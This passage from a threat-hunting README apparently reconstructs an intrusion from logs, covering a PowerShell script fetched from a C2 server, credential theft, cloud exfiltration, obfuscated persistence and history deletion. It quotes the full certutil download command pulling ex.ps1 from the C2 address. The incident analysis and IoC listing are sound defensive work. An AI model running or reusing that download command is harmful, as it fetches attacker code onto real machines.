behan101/Threat-Hunt-Cargo-Hold/README.md

 <img width="1168" height="304" alt="image" src="https://github.com/user-attachments/assets/bd9e8334-3d45-45f3-87eb-d2d452ae764d" />

 From the logs, the PowerShell script `ex.ps1` was downloaded into the staging directory `C:\Windows\Logs\CBS\` through the IP address `78.141.196.6`.
 The script then triggered events that collected credentials, prepared the data for exfiltration, and exfiltrated the stolen data through a cloud service.
 Evidence of persistence was found in the form of an obfuscated PowerShell file `svchost.ps1`.
 Anti-forensic attempts were apparent by the deletion of the PowerShell history file `ConsoleHost_history.txt`.<br>

 The earliest signs of malicious command execution point to the unauthorized download of a suspicious script by using legitimate system utilities with network access.

 <img width="1312" height="362" alt="image" src="https://github.com/user-attachments/assets/bdfc9daa-9aa9-45d9-a224-d1e78b632100" />

+The PowerShell script `ex.ps1` was downloaded at using the command `"certutil.exe" -urlcache -f http://78.141.196.6:7331/ex.ps1` which also established the first contact of the C2 server `78.141.196.6`.

 ## Indicators of Compromise (IoCs)
 ### C2 IP: